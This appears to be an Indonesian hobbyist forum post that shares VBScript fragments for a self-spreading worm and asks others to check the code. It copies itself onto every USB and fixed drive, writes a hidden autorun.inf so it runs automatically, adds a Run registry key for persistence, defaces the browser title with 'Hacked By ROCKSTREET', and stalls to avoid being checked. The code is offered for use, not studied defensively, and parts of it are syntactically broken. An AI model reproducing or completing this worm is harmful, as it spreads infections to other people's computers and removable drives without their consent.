woowww
kaka gimana klo codingnya di tambahin supaya nanti sang virus membuat cloningnya di steiap USB/ port lainnya yg masuk [autorun.inf] yg telah di modiv
- Code: Select all
'//Buat Autorun.inf untuk menjalankan virus otomatis setiap flash dish yang masuk//
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> @A:@ Then
Set tf = fs.getfile(flashdrive.Path & @\NAMA VIRUS.dll.vbs@)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & @\NAMA VIRUS.dll.vbs@, 2, True)
tf.write src:
tf.Close
Set tf = fs.getfile(flashdrive.Path & @\NAMA VIRUS.dll.vbs@)
tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & @\autorun.inf@)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & @\autorun.inf@, 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & @\autorun.inf@)
tf.Attributes = 39
End If
- Code: Select all
'//Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information//
atr = @[autorun]@&vbcrlf&@shellexecute=wscript.exe NAMA VIRUS.dll.vbs@
Set fs = CreateObject(@Scripting.FileSystemObject@)
Set mf = fs.getfile(Wscript.ScriptFullname)
Dim text, size
size = mf.size
check = mf.drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
src=src&text.readline
src = src & vbCrLf
Loop Do
- Code: Select all
'//Manipulasi Registry//
Set rg = CreateObject(@WScript.Shell@)
rg.regwrite @HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\load@,winpath & @\rockstreet.dll.vbs@
rg.regwrite @HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title@, @[--Hacked By ROCKSTREET--] @InF @
rg.regwrite @HKCR\vbsfile\DefaultIcon@, @shell32.dll,2@
'//jika di periksa maka program berhenti selama 20 detik//
If check <> 1 Then Wscript.sleep 200000
Loop While check <> 1
Set sd = CreateObject(@Wscript.shell@)
sd.run winpath & @\explorer.exe /e,/select, @ & Wscript.ScriptFullname
mavin iah kaka klo ada coding yg salah maklom baru belajar